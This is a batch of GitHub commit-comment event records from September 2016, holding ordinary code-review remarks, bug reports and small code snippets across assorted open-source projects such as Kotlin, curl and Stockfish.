{"id":"4532328257","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18940806,"position":null,"line":null,"path":null,"commit_id":"e609559f069137f589f55eb7511135d066a7c419","created_at":"2016-09-08T07:40:15Z","updated_at":"2016-09-08T07:40:15Z","body":"Also see [Issue 236: word64 compile problems due to SSE2 and NEON interfaces](https://github.com/weidai11/cryptopp/issues/236)."}},"created_at":"2016-09-08T07:40:15Z"}
{"id":"4532334969","type":"CommitCommentEvent","actor":{"login":"vszakats"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18940819,"position":null,"line":null,"path":null,"commit_id":"8fa20da8e1a2f38440610221576ff027eb0c7e5e","created_at":"2016-09-08T07:41:51Z","updated_at":"2016-09-08T07:41:51Z","body":"@jay Thank you for the guidelines, I read them two days ago, also bookmarked for future reference.\r\n\r\nIn this particular case I first tested the modification in a local repository, then &mdash; like before in similar simple, single-file modifications &mdash;, I used the _lazy_ workflow &mdash; the GitHub web interface &mdash; to edit the file. \"Normally\" this results in a new branch created under a automatic fork, which can then be promoted for a PR. What I didn't realise in time, that &mdash; as a member of the committer team &mdash;, the former logic is no longer true and the commit now goes right into the repo. My newbie mistake and an experience to keep in mind for the future. (Either the practice of web editing should be stopped or a temporary branch shall be created first, or, to always stay on the command-line.)\r\n\r\nThank for your patience and confidence.\r\n"}},"created_at":"2016-09-08T07:41:51Z"}
{"id":"4532336704","type":"CommitCommentEvent","actor":{"login":"dktapps"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18940821,"position":null,"line":null,"path":null,"commit_id":"fa5852f78714b2c72a445675f06df06fcf16fc14","created_at":"2016-09-08T07:42:18Z","updated_at":"2016-09-08T07:42:18Z","body":"I said I didn't want my Twitter spamming. That's why I reverted that commit! >:-["}},"created_at":"2016-09-08T07:42:18Z"}
{"id":"4532337391","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18940824,"position":6,"line":30,"path":"plugins/CuraProfileReader/CuraProfileReader.py","commit_id":"d7d18043196734ae98da57ea24033b34cd485765","created_at":"2016-09-08T07:42:28Z","updated_at":"2016-09-08T07:42:28Z","body":"I'm not sure if it's actually required to close it. It's nicer to do it, but the garbage collection should handle it right? "}},"created_at":"2016-09-08T07:42:28Z"}
{"id":"4532340519","type":"CommitCommentEvent","actor":{"login":"balsmn"},"repo":{"name":"eclipse/leshan"},"payload":{"comment":{"id":18940831,"position":86,"line":86,"path":"leshan-server-cf/src/main/java/org/eclipse/leshan/server/californium/impl/InMemoryLwM2mObservationStore.java","commit_id":"df29e7b361ee49422583af5386dff9cfd24cd7d1","created_at":"2016-09-08T07:43:13Z","updated_at":"2016-09-08T07:43:13Z","body":"@msangoi Yes I know. I also did a Git pull for 2.0.x californium. The [last commit](https://github.com/eclipse/californium/commit/ecb504502832a804e9db1926fe2a2d5db8548606) in Californium from you has touched Request and InMemoryObservationStore but the code for [DataParser](https://github.com/eclipse/californium/blob/2.0.x/californium-core/src/main/java/org/eclipse/californium/core/network/serialization/DataParser.java) in 2.0.x branch Californium doesn't have this method. Thats why the compilation error. "}},"created_at":"2016-09-08T07:43:13Z"}
{"id":"4532341116","type":"CommitCommentEvent","actor":{"login":"Rokerdawg"},"repo":{"name":"udacity/Sunshine-Version-2"},"payload":{"comment":{"id":18940832,"position":null,"line":null,"path":null,"commit_id":"f63ba9f1873f55120696d9a1f9d203f9618daae6","created_at":"2016-09-08T07:43:21Z","updated_at":"2016-09-08T07:43:21Z","body":"@rahulsther \r\nI had the same problem and I have found the solution:\r\n\r\n1) You have to use:\r\n\r\n<menu xmlns:android=\"http://schemas.android.com/apk/res/android\"\r\n    xmlns:bwq=\"http://schemas.android.com/apk/res-auto\" >\r\n\r\n    <item\r\n        android:id=\"@+id/menu_share\"\r\n        android:title=\"@string/menu_share\"\r\n        bwq:actionProviderClass=\"android.support.v7.widget.ShareActionProvider\"\r\n        bwq:showAsAction=\"always\"/>\r\n</menu>\r\n\r\n2) and in Java\r\n\r\nimport android.support.v7.widget.ShareActionProvider;\r\nand\r\n\r\n// Locate MenuItem with ShareActionProvider\r\nMenuItem item = menu.findItem(R.id.menu_share);\r\n// Fetch and store ShareActionProvider\r\nmShareActionProvider = (ShareActionProvider) MenuItemCompat.getActionProvider(item);"}},"created_at":"2016-09-08T07:43:21Z"}
{"id":"4532342599","type":"CommitCommentEvent","actor":{"login":"chenyang78"},"repo":{"name":"csmith-project/creduce"},"payload":{"comment":{"id":18940837,"position":5,"line":143,"path":"clang_delta/RemoveUnusedOuterClass.cpp","commit_id":"7da8763a615444100ab29a09084bb705b810a95c","created_at":"2016-09-08T07:43:45Z","updated_at":"2016-09-08T07:43:45Z","body":"@octoploid Thanks for the double-check, Markus. The code is the correct. The newly-added ```getBraceRange().getEnd()``` is equivalent to the previous ```getRBraceLoc```, which refers to the location after the right curly brace. The ```LocStart``` actually means the start point of the second half of the code region that needs to be removed. It may not be a good name though. "}},"created_at":"2016-09-08T07:43:45Z"}
{"id":"4532344562","type":"CommitCommentEvent","actor":{"login":"chenyang78"},"repo":{"name":"csmith-project/creduce"},"payload":{"comment":{"id":18940840,"position":5,"line":143,"path":"clang_delta/SimplifyNestedClass.cpp","commit_id":"7da8763a615444100ab29a09084bb705b810a95c","created_at":"2016-09-08T07:44:14Z","updated_at":"2016-09-08T07:44:14Z","body":"Same as above. Thanks.\r\n"}},"created_at":"2016-09-08T07:44:14Z"}
{"id":"4532348146","type":"CommitCommentEvent","actor":{"login":"AtulRathore"},"repo":{"name":"AtulRathore/Web-Database-Interaction"},"payload":{"comment":{"id":18940846,"position":61,"line":61,"path":"app/src/main/java/com/example/atul/webdatabseinteraction/MainActivity.java","commit_id":"bd82168ac132736239f2268c903c15c2b65023a5","created_at":"2016-09-08T07:45:10Z","updated_at":"2016-09-08T07:45:10Z","body":"Replace \"user\" with \"user_email\""}},"created_at":"2016-09-08T07:45:10Z"}
{"id":"4532349823","type":"CommitCommentEvent","actor":{"login":"zenangst"},"repo":{"name":"hyperoslo/Imaginary"},"payload":{"comment":{"id":18940850,"position":null,"line":null,"path":null,"commit_id":"e111dcfcd5a67e6d52febc48c5ebfb9090f77af5","created_at":"2016-09-08T07:45:33Z","updated_at":"2016-09-08T07:45:33Z","body":"![giphy-85](https://cloud.githubusercontent.com/assets/57446/18341158/f94e6678-75a8-11e6-8018-46873792bad1.gif)\r\n"}},"created_at":"2016-09-08T07:45:33Z"}
{"id":"4532350109","type":"CommitCommentEvent","actor":{"login":"KleinerNull"},"repo":{"name":"KleinerNull/geopy"},"payload":{"comment":{"id":18940851,"position":null,"line":null,"path":null,"commit_id":"7cd57ba7578b575f21959f4aba932f31d9a2bd7b","created_at":"2016-09-08T07:45:37Z","updated_at":"2016-09-08T07:45:37Z","body":"Python automatically validates the boolean value of any expression in an if statement. So `0`, `[]`, and the empty string will be always validate as `False`.\r\n\r\n    In [1]: [i for i in [0,1,2,3,4] if i]\r\n    Out[1]: [1, 2, 3, 4]\r\n\r\n    In [2]: [i for i in ['', 0, [], 1,2,3,4,'a', 'b','c', [1,2,3]] if i]\r\n    Out[2]: [1, 2, 3, 4, 'a', 'b', 'c', [1, 2, 3]]\r\n"}},"created_at":"2016-09-08T07:45:37Z"}
{"id":"4532361640","type":"CommitCommentEvent","actor":{"login":"jpinedaf"},"repo":{"name":"GBTAmmoniaSurvey/DR1_analysis"},"payload":{"comment":{"id":18940864,"position":null,"line":null,"path":null,"commit_id":"64c0fe9405661cda5a6546cb3c577475f1e2a46e","created_at":"2016-09-08T07:48:20Z","updated_at":"2016-09-08T07:48:20Z","body":"the color palette is not a problem for colorblind (http://colorbrewer2.org/#type=diverging&scheme=RdYlBu&n=3), although it is a problem for printing grayscale. I would not worry so much :)"}},"created_at":"2016-09-08T07:48:20Z"}
{"id":"4532363285","type":"CommitCommentEvent","actor":{"login":"cheeaun"},"repo":{"name":"kaihendry/prazefarm"},"payload":{"comment":{"id":18940866,"position":null,"line":null,"path":null,"commit_id":"70141769dba9f39807b841d40b5bbb7cb7374ceb","created_at":"2016-09-08T07:48:43Z","updated_at":"2016-09-08T07:48:43Z","body":"👍 "}},"created_at":"2016-09-08T07:48:43Z"}
{"id":"4532365020","type":"CommitCommentEvent","actor":{"login":"at15"},"repo":{"name":"pandacut/ffmpeg-go"},"payload":{"comment":{"id":18940869,"position":null,"line":null,"path":null,"commit_id":"44d966579569c726657c3654ee026a7d63adc7b4","created_at":"2016-09-08T07:49:10Z","updated_at":"2016-09-08T07:49:10Z","body":"\\w/ 学长好厉害 "}},"created_at":"2016-09-08T07:49:10Z"}
{"id":"4532370530","type":"CommitCommentEvent","actor":{"login":"sopel39"},"repo":{"name":"Teradata/presto"},"payload":{"comment":{"id":18940881,"position":112,"line":112,"path":"presto-product-tests/src/main/java/com/facebook/presto/tests/jdbc/LdapTests.java","commit_id":"9eeba7e72715793aa41a1de88a84559ed034b83b","created_at":"2016-09-08T07:50:26Z","updated_at":"2016-09-08T07:50:26Z","body":"Would using special group for LDAP test work? E.g: this group would be selected only during LDAP test run."}},"created_at":"2016-09-08T07:50:26Z"}
{"id":"4532376426","type":"CommitCommentEvent","actor":{"login":"dgryski"},"repo":{"name":"Netflix/rend"},"payload":{"comment":{"id":18940887,"position":null,"line":null,"path":null,"commit_id":"e44a5fb54d58d3e1f4a09b65202eddd8c849b27a","created_at":"2016-09-08T07:51:47Z","updated_at":"2016-09-08T07:51:47Z","body":"Would running https://github.com/klauspost/asmfmt over everything here help?"}},"created_at":"2016-09-08T07:51:47Z"}
{"id":"4532378676","type":"CommitCommentEvent","actor":{"login":"DerpfacePython"},"repo":{"name":"LogicodeLang/Logicode"},"payload":{"comment":{"id":18940890,"position":null,"line":null,"path":null,"commit_id":"2542f7726509ba9f15ef6dab36f3de6e5e43afc3","created_at":"2016-09-08T07:52:18Z","updated_at":"2016-09-08T07:52:18Z","body":"Oh, cool! You added support for the multiple heads and tails!"}},"created_at":"2016-09-08T07:52:18Z"}
{"id":"4532381243","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18940895,"position":13,"line":43,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"6b792361c092c53b1ed577a9f053ffc8e027fb1a","created_at":"2016-09-08T07:52:53Z","updated_at":"2016-09-08T07:52:53Z","body":"It seems `protected` is unnecessary here and below, isn't it?"}},"created_at":"2016-09-08T07:52:53Z"}
{"id":"4532386471","type":"CommitCommentEvent","actor":{"login":"kuh9325"},"repo":{"name":"likelion-kau1/malangKau"},"payload":{"comment":{"id":18940899,"position":null,"line":null,"path":null,"commit_id":"a4e6253039705e8277c1b8bbd9930255c16a8ea1","created_at":"2016-09-08T07:54:05Z","updated_at":"2016-09-08T07:54:05Z","body":"어느 기능이 추가되어야 하는지, 어느 부분에서 문제가 발생했는지 상세히 적어주면 좋을듯!"}},"created_at":"2016-09-08T07:54:05Z"}
{"id":"4532390545","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":18940901,"position":null,"line":null,"path":null,"commit_id":"d909d10f33df023be46a2633608bdf655d1f5a62","created_at":"2016-09-08T07:54:50Z","updated_at":"2016-09-08T07:54:50Z","body":"Thanks, I will fix in the next patch.\n\n\n\nOn Thursday, September 8, 2016, Kingdefender <notifications@github.com>\nwrote:\n\n> Congratulations to Ajith!\n>\n> I had one small comment on the indents here 923-925 Marco\n>\n> +      if (  !rootNode\n> +         && !inCheck\n> +         &&  bestValue > VALUE_MATED_IN_MAX_PLY)\n>\n> I think the && are one space too far to the left.. Can you still correct\n> it?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/official-stockfish/Stockfish/commit/d909d10f33df023be46a2633608bdf655d1f5a62#commitcomment-18940236>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABDGASNNPyAPy3_93o4bWuLyddEAPlaJks5qn61CgaJpZM4J3qKV>\n> .\n>\n"}},"created_at":"2016-09-08T07:54:50Z"}
{"id":"4532393471","type":"CommitCommentEvent","actor":{"login":"nealedj"},"repo":{"name":"potatolondon/search"},"payload":{"comment":{"id":18940907,"position":null,"line":null,"path":null,"commit_id":"551c31868ee9e6d56117aa99609c62c2eb8e9761","created_at":"2016-09-08T07:55:31Z","updated_at":"2016-09-08T07:55:31Z","body":"It's the latter. In the case where I noticed it my object follows an FK\nduring the index build which tries to execute a query.\n\nOn Wed, 7 Sep 2016 21:36 Martin Allison, <notifications@github.com> wrote:\n\n> How come build is calling save on anything anyways? And if that's the\n> case, can the calling code wrap the relevant part with non_atomic?\n>\n> Or is this because build is happening on an atomic save of something\n> somewhere, and looking up related objects in build is causing errors?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/potatolondon/search/commit/551c31868ee9e6d56117aa99609c62c2eb8e9761#commitcomment-18935209>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAVu69hxFBD96fzRXIkfOf6N5DNAw4O0ks5qnyBkgaJpZM4J3KG2>\n> .\n>\n"}},"created_at":"2016-09-08T07:55:31Z"}
{"id":"4532394573","type":"CommitCommentEvent","actor":{"login":"burisu"},"repo":{"name":"ekylibre/ekylibre"},"payload":{"comment":{"id":18940908,"position":3,"line":3,"path":"config/procedures/housing_soil_disinfection.xml","commit_id":"ecf01cd50dacedd6c80ec691e6fc72d067e26336","created_at":"2016-09-08T07:55:47Z","updated_at":"2016-09-08T07:55:47Z","body":"`hygiene` is not a procedure action,prefer `cleaning` or similar (based on action verb)"}},"created_at":"2016-09-08T07:55:47Z"}
{"id":"4532397192","type":"CommitCommentEvent","actor":{"login":"zzq889"},"repo":{"name":"pandacut/ffmpeg-go"},"payload":{"comment":{"id":18940911,"position":null,"line":null,"path":null,"commit_id":"44d966579569c726657c3654ee026a7d63adc7b4","created_at":"2016-09-08T07:56:23Z","updated_at":"2016-09-08T07:56:23Z","body":"这个有个 bug, 如果 debug server halt 了需要重启"}},"created_at":"2016-09-08T07:56:23Z"}
{"id":"4532397594","type":"CommitCommentEvent","actor":{"login":"fwalch"},"repo":{"name":"adolenc/cl-neovim"},"payload":{"comment":{"id":18940912,"position":5,"line":5,"path":".ci/before_script.sh","commit_id":"4df5d71ca70b7342b823a2a540f2bfb5d6fb82fa","created_at":"2016-09-08T07:56:28Z","updated_at":"2016-09-08T07:56:28Z","body":"It's not preserved because each Travis step script is run in a separate shell, and `export`s don't have an effect on the parent shell. Only way around it is to export stuff (e.g. via `env.global` or indirectly via [`eval`](https://github.com/neovim/python-client/blob/master/.travis.yml#L28))  in `.travis.yml`."}},"created_at":"2016-09-08T07:56:28Z"}
{"id":"4532400929","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18940919,"position":4,"line":35,"path":"groot/groot.go","commit_id":"7a944282f0df0832bbe8f40bb1b1e3053a30e2b4","created_at":"2016-09-08T07:57:14Z","updated_at":"2016-09-08T07:57:14Z","body":"We discussed exactly that when we're pairing and decided to go with it for now and split it out in the future - just to avoid another sort of abstraction (with only one method) at this moment. Maybe the following stories will guide us that way.."}},"created_at":"2016-09-08T07:57:14Z"}
{"id":"4532401462","type":"CommitCommentEvent","actor":{"login":"StrahilKazlachev"},"repo":{"name":"aurelia/dialog"},"payload":{"comment":{"id":18940921,"position":22,"line":91,"path":"test/unit/dialog-service.spec.js","commit_id":"79e39a76067f949a49b30e68bce6aa2570812d4a","created_at":"2016-09-08T07:57:21Z","updated_at":"2016-09-08T07:57:21Z","body":"I'm ok with it, but why not?\r\n```\r\n  .catch(() => {\r\n    catchWasCalled = true;\r\n  })\r\n  .then(() => {\r\n    expect(catchWasCalled).toBe(true);\r\n    done();\r\n  });\r\n```\r\nOr you want to avoid the timeout error?"}},"created_at":"2016-09-08T07:57:21Z"}
{"id":"4532404802","type":"CommitCommentEvent","actor":{"login":"albertoleal"},"repo":{"name":"cloudfoundry/grootfs"},"payload":{"comment":{"id":18940927,"position":16,"line":93,"path":"store/volume_driver/btrfs.go","commit_id":"4fbd6587f6306401c6b8ec6862c4e6873448a300","created_at":"2016-09-08T07:58:09Z","updated_at":"2016-09-08T07:58:09Z","body":"Indeed 👍 "}},"created_at":"2016-09-08T07:58:09Z"}
{"id":"4532405294","type":"CommitCommentEvent","actor":{"login":"hdabing"},"repo":{"name":"hdabing/git"},"payload":{"comment":{"id":18940928,"position":null,"line":null,"path":null,"commit_id":"6ed2e4fbe3fa5628a7d22b893dc2da54212b4594","created_at":"2016-09-08T07:58:15Z","updated_at":"2016-09-08T07:58:15Z","body":"Git入门.docx"}},"created_at":"2016-09-08T07:58:15Z"}
{"id":"4532409980","type":"CommitCommentEvent","actor":{"login":"Rabsztok"},"repo":{"name":"untitledkingdom/mina-puma"},"payload":{"comment":{"id":18940935,"position":null,"line":null,"path":null,"commit_id":"7144e81e79762feecc20d1b593b4e54a1df79ed4","created_at":"2016-09-08T07:59:21Z","updated_at":"2016-09-08T07:59:21Z","body":"@whysthatso just add `set :puma_port, 80` into your deploy.rb script.\r\nThis variable is nil by default (as any other uninitialized mina config variable)."}},"created_at":"2016-09-08T07:59:21Z"}
{"id":"4532417216","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18940945,"position":9,"line":91,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"a194dd3d402fe9961d766ae69087b31ba841ae88","created_at":"2016-09-08T08:00:58Z","updated_at":"2016-09-08T08:00:58Z","body":"This function can return the original ArrayList, where capacity may be > size, so we may end up wasting some space for nulls. I think using `toReadOnlyList` made more sense"}},"created_at":"2016-09-08T08:00:58Z"}
{"id":"4532420145","type":"CommitCommentEvent","actor":{"login":"cescoffier"},"repo":{"name":"cescoffier/vertx-cache"},"payload":{"comment":{"id":18940948,"position":null,"line":null,"path":null,"commit_id":"7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401","created_at":"2016-09-08T08:01:32Z","updated_at":"2016-09-08T08:01:32Z","body":"Unfortunately, all these cache are blocking if I’m not mistaken (or as you say won’t use the right context).\n\nHowever, it’s easy to build a non blocking map such as: https://github.com/vert-x3/vertx-service-discovery/blob/master/vertx-service-discovery/src/main/java/io/vertx/servicediscovery/impl/AsyncMap.java <https://github.com/vert-x3/vertx-service-discovery/blob/master/vertx-service-discovery/src/main/java/io/vertx/servicediscovery/impl/AsyncMap.java>\n\n> On 8 sept. 2016, at 08:12, Mats Melke <notifications@github.com> wrote:\n> \n> Thanks for your answer @cescoffier <https://github.com/cescoffier> ! Would you consider other in-JVM caches like ehcache, guava or cache2k to be inappropriate to use in a Vert.x environment? Being blocking or otherwise not suitable for the Vert.x threading model?\n> \n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub <https://github.com/cescoffier/vertx-cache/commit/7ac6c9cf6bae13fb62203dbf3ec52dd8af9d2401#commitcomment-18940046>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AAYjfQPHs_BvOm7XOhg0XQ8I-BxOxPRFks5qn6c_gaJpZM4J3DP1>.\n> \n\n"}},"created_at":"2016-09-08T08:01:32Z"}
{"id":"4532426325","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18940956,"position":7,"line":355,"path":"application/helpers/replacements_helper.php","commit_id":"fd5ca4333388f092d69c0133f3a46f323c330d00","created_at":"2016-09-08T08:02:58Z","updated_at":"2016-09-08T08:02:58Z","body":"Wrong message?"}},"created_at":"2016-09-08T08:02:58Z"}
{"id":"4532427179","type":"CommitCommentEvent","actor":{"login":"jekkos"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18940960,"position":6,"line":49,"path":"database/2.4_to_3.0.sql","commit_id":"08e82094466a799c74c7151fa00a08d2d5c8f586","created_at":"2016-09-08T08:03:11Z","updated_at":"2016-09-08T08:03:11Z","body":"Indeed will need to delete old value first."}},"created_at":"2016-09-08T08:03:11Z"}
{"id":"4532435333","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18940971,"position":27,"line":144,"path":"core/deserialization/src/org/jetbrains/kotlin/serialization/deserialization/descriptors/DeserializedMemberScope.kt","commit_id":"a194dd3d402fe9961d766ae69087b31ba841ae88","created_at":"2016-09-08T08:05:09Z","updated_at":"2016-09-08T08:05:09Z","body":"Why did you remove `.toReadOnlyList()`? The capacity of the list may be greater than its size, so we may end up wasting some space for nulls here."}},"created_at":"2016-09-08T08:05:09Z"}
{"id":"4532436387","type":"CommitCommentEvent","actor":{"login":"napernik"},"repo":{"name":"Orckestra/C1-CMS"},"payload":{"comment":{"id":18940975,"position":106,"line":139,"path":"Composite/C1Console/Trees/GenericAddDataActionNode.cs","commit_id":"b1f70368622c89bbb4d53bdc744f12856befa46c","created_at":"2016-09-08T08:05:22Z","updated_at":"2016-09-08T08:05:22Z","body":"It was there before, I assume - validating the document and throwing an exception earlier if it is invalid"}},"created_at":"2016-09-08T08:05:22Z"}
{"id":"4532437238","type":"CommitCommentEvent","actor":{"login":"daN4cat"},"repo":{"name":"jekkos/opensourcepos"},"payload":{"comment":{"id":18940976,"position":6,"line":49,"path":"database/2.4_to_3.0.sql","commit_id":"08e82094466a799c74c7151fa00a08d2d5c8f586","created_at":"2016-09-08T08:05:33Z","updated_at":"2016-09-08T08:05:33Z","body":"I could have done with a change but I was lazy and did that way. Works fine too no big deal."}},"created_at":"2016-09-08T08:05:33Z"}
{"id":"4532437771","type":"CommitCommentEvent","actor":{"login":"zyuanming"},"repo":{"name":"zyuanming/HSStockChart"},"payload":{"comment":{"id":18940978,"position":null,"line":null,"path":null,"commit_id":"562f1da0e4e91fce3a76d5d05abf4da2d4bccb1a","created_at":"2016-09-08T08:05:41Z","updated_at":"2016-09-08T08:05:41Z","body":"not bad.... i will find a way to pull your commit"}},"created_at":"2016-09-08T08:05:41Z"}
{"id":"4532442016","type":"CommitCommentEvent","actor":{"login":"marcomarinho"},"repo":{"name":"EuclideanOS/android_vendor_euc"},"payload":{"comment":{"id":18940985,"position":null,"line":null,"path":null,"commit_id":"0432b771fbf56ddb2bbf17d6b60f9ef6e6f88593","created_at":"2016-09-08T08:06:42Z","updated_at":"2016-09-08T08:06:42Z","body":"It's already on android_build so it's kinda useless here xD"}},"created_at":"2016-09-08T08:06:42Z"}
{"id":"4532443322","type":"CommitCommentEvent","actor":{"login":"rudolfb"},"repo":{"name":"rudolfb/time-tracker"},"payload":{"comment":{"id":18940989,"position":null,"line":null,"path":null,"commit_id":"6adb97623354d6194c8970f6289a656c78761306","created_at":"2016-09-08T08:06:59Z","updated_at":"2016-09-08T08:06:59Z","body":"@knewter I could only reproduce this on my Windows machine at work. On my Ubuntu at home I could never click fast enough to insert more than one user. The implementation is rooted in my only rudimentary knowledge of Elm. I was unsure if it would be enough to have only one disabled flag in the model for any submit button, or if every workflow (User, Projects, Organisations, etc.) need their own disabled flag. One could argue that only one flag is needed, because normally when I click a button, I want the processing to complete before I am able to click the next button. If I click on Submit I do not want the user to be able to click on Cancel. If I have a fire-and-forget process, even then I could implement the disabling of the the other buttons. "}},"created_at":"2016-09-08T08:06:59Z"}
{"id":"4532443950","type":"CommitCommentEvent","actor":{"login":"ScottMansfield"},"repo":{"name":"Netflix/rend"},"payload":{"comment":{"id":18940991,"position":null,"line":null,"path":null,"commit_id":"e44a5fb54d58d3e1f4a09b65202eddd8c849b27a","created_at":"2016-09-08T08:07:08Z","updated_at":"2016-09-08T08:07:08Z","body":"oh hey that looks really awesome. thanks."}},"created_at":"2016-09-08T08:07:08Z"}
{"id":"4532450339","type":"CommitCommentEvent","actor":{"login":"baravak"},"repo":{"name":"baravak/Saloos"},"payload":{"comment":{"id":18941000,"position":null,"line":null,"path":null,"commit_id":"0c9b4b0938dbb84cd2818ed879d9f63c8341aa38","created_at":"2016-09-08T08:08:28Z","updated_at":"2016-09-08T08:08:28Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;bTt0A06y&#x2F;64--\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> سیف کردن خروجی گت و پست</a>"}},"created_at":"2016-09-08T08:08:28Z"}
{"id":"4532456088","type":"CommitCommentEvent","actor":{"login":"baravak"},"repo":{"name":"baravak/Saloos"},"payload":{"comment":{"id":18941005,"position":null,"line":null,"path":null,"commit_id":"0c9b4b0938dbb84cd2818ed879d9f63c8341aa38","created_at":"2016-09-08T08:09:38Z","updated_at":"2016-09-08T08:09:38Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;7g2r4Gmk&#x2F;63--\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> سیف کردن خروجی کوکی ها</a>"}},"created_at":"2016-09-08T08:09:38Z"}
{"id":"4532460569","type":"CommitCommentEvent","actor":{"login":"tomcw"},"repo":{"name":"AppleWin/AppleWin"},"payload":{"comment":{"id":18941014,"position":null,"line":null,"path":null,"commit_id":"034faa04b91b27cf0b4a81b92497a35cfdf5e21b","created_at":"2016-09-08T08:10:40Z","updated_at":"2016-09-08T08:10:40Z","body":"Thanks for the comments.\r\n\r\nWe considering tagging this release as \"beta\" as there are big changes in these 3 areas (in order of severity):\r\n\r\n- NTSC video rendering\r\n- Full-screen native (not 640x480 resolution)\r\n- Save-state is now yaml format\r\n\r\nAlthough there's been a reasonable level of developer testing over the past months, the extend of the changes could mean that there are some edge-cases affecting stability or leading to regressions.\r\n\r\n> Readme.md shows an out of date 1.25.0.3 as the \"latest release\". \r\n\r\nI'll bump this once I've published a new 1.26 release build.\r\n\r\nTom"}},"created_at":"2016-09-08T08:10:40Z"}
{"id":"4532465246","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":18941022,"position":4,"line":87,"path":"core/util.runtime/src/org/jetbrains/kotlin/utils/collections.kt","commit_id":"a194dd3d402fe9961d766ae69087b31ba841ae88","created_at":"2016-09-08T08:11:44Z","updated_at":"2016-09-08T08:11:44Z","body":"I think this function should take an `ArrayList` and compact it as well with `trimToSize`:\r\n```\r\nfun <T> ArrayList<T>.compact(): List<T> =\r\n        when (size) {\r\n            0 -> emptyList()\r\n            1 -> listOf(first())\r\n            else -> this.apply(ArrayList<T>::trimToSize)\r\n        }\r\n```\r\n"}},"created_at":"2016-09-08T08:11:44Z"}
{"id":"4532465504","type":"CommitCommentEvent","actor":{"login":"fasterrr"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18941023,"position":203,"line":226,"path":"local/templates/.default/components/bitrix/catalog.bigdata.products/autobody.bigdata.products/template.php","commit_id":"a95ce21a66d72f3f3e6201989fe476ef72bfd413","created_at":"2016-09-08T08:11:48Z","updated_at":"2016-09-08T08:11:48Z","body":"зачем оставил это"}},"created_at":"2016-09-08T08:11:48Z"}
{"id":"4532465686","type":"CommitCommentEvent","actor":{"login":"jordwalke"},"repo":{"name":"bsansouci/reason"},"payload":{"comment":{"id":18941024,"position":17,"line":3017,"path":"src/reason_pprint_ast.ml","commit_id":"11b83517d39a886f2a8036e94680ca0a836433c0","created_at":"2016-09-08T08:11:51Z","updated_at":"2016-09-08T08:11:51Z","body":"It's not the `rules` that is lacking. It's `unparseExpr` IIRC. You should probably update the comment."}},"created_at":"2016-09-08T08:11:51Z"}
{"id":"4532467604","type":"CommitCommentEvent","actor":{"login":"jaafar173"},"repo":{"name":"jaafar173/Lagou"},"payload":{"comment":{"id":18941028,"position":null,"line":null,"path":null,"commit_id":"e60e1d63676b7c4bf765b8a8cf19ddeaad954538","created_at":"2016-09-08T08:12:20Z","updated_at":"2016-09-08T08:12:20Z","body":"Ok"}},"created_at":"2016-09-08T08:12:20Z"}
{"id":"4532467621","type":"CommitCommentEvent","actor":{"login":"fasterrr"},"repo":{"name":"gitwebgk/autobody"},"payload":{"comment":{"id":18941029,"position":266,"line":250,"path":"local/templates/.default/components/bitrix/catalog.bigdata.products/autobody.bigdata.products/template.php","commit_id":"a95ce21a66d72f3f3e6201989fe476ef72bfd413","created_at":"2016-09-08T08:12:20Z","updated_at":"2016-09-08T08:12:20Z","body":"почему тут закомментировано? фотки не нужны здесь?"}},"created_at":"2016-09-08T08:12:20Z"}
{"id":"4532467861","type":"CommitCommentEvent","actor":{"login":"HokoriXIII"},"repo":{"name":"Necrobot-Private/NecroBot"},"payload":{"comment":{"id":18941032,"position":null,"line":null,"path":null,"commit_id":"b48c9fd893d296030df38c21e9aff255c1e5afdc","created_at":"2016-09-08T08:12:23Z","updated_at":"2016-09-08T08:12:23Z","body":"GUI don`t start. Crashes on launch."}},"created_at":"2016-09-08T08:12:23Z"}
{"id":"4532468693","type":"CommitCommentEvent","actor":{"login":"GreenAsJade"},"repo":{"name":"ryantheleach/GameOfFactions"},"payload":{"comment":{"id":18941034,"position":null,"line":null,"path":null,"commit_id":"327acd87b8b6f40e5e78e060de0d8bde4d955175","created_at":"2016-09-08T08:12:33Z","updated_at":"2016-09-08T08:12:33Z","body":"LOL - I could totally relate :)\r\n"}},"created_at":"2016-09-08T08:12:33Z"}
